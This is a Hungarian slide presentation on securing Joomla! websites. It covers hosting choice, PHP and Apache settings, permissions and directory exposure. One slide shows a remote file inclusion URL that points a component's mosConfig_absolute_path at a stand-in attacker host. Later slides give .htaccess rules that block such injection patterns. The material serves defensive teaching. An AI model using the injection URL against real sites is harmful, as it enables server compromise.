Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Budapest
Hotel Flandria
Gyurkó Zoltán
A Joomla! és a biztonság
Hogyan tegyük bitzonságosabbá
Joomla! oldalunkat
Mi a támadások célja?
Biztonságosak e a
komponensek/modulok/mambotok
/templétek?
Tekintsük mindet nem biztonságosnak.
Mit lehet/kell tenni?
Kezeljük kiemelten fontos kérdésként!
Foglalkozzunk vele!
Telepítés előtt
Telepítés közben
Fejlesztés alatt
Publikálás után rendszeresen
Telepítés előtt:
Körültekintően válasszunk szolgáltatót!
Nem az a jó ami olcsó és biztos, hogy minden fut.
Tájékozódjunk, kérdezzünk!.
Oprendszer, szerver beállítások
Php beállítások (phpinfo) –
register_globals, allow_url_fopen
Apache beállítások (jogosultságok,
mod_security, .htaccess)
Tűzfal beállítások
Telepítés közben:
A legfrisebb stabill verziót telepítsük,
és megbízható helyről töltsük le.
Register_globals emuláció:
• globals.php - define( 'RG_EMULATION', 0 )
Fájl/könyvtár jogosultságok:
777 jogosultságot kerüljük
http://celpont.net/administrator/components/com_veszelyesk
omponens/veszelyeskomponens.php
veszelyeskompnens.php?mosConfig_absolute_path=http://z
ombigep.net/eldugottkonyvtar
include(’
http://zombigep.net/eldugottkonyvtar/mysettings.php
’)
// allow_url_fopen
URL injection: védekezés
.htaccess
Order allow,deny
URL injection: védekezés
.htaccess
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
Csak az legyen elérhető a webről
ami szükséges
/index.php
/index2.php
/images
/templates (!!!)
/administrator/index.php
/administrator/index2.php
/administrator/index3.php
/administrator/images/
/administrator/templates/
URL injection: védekezés
legyen index.html
(vagy directoryindex index.php)
uploads temp könyvtár
Backup
Publikálás után rendszeresen: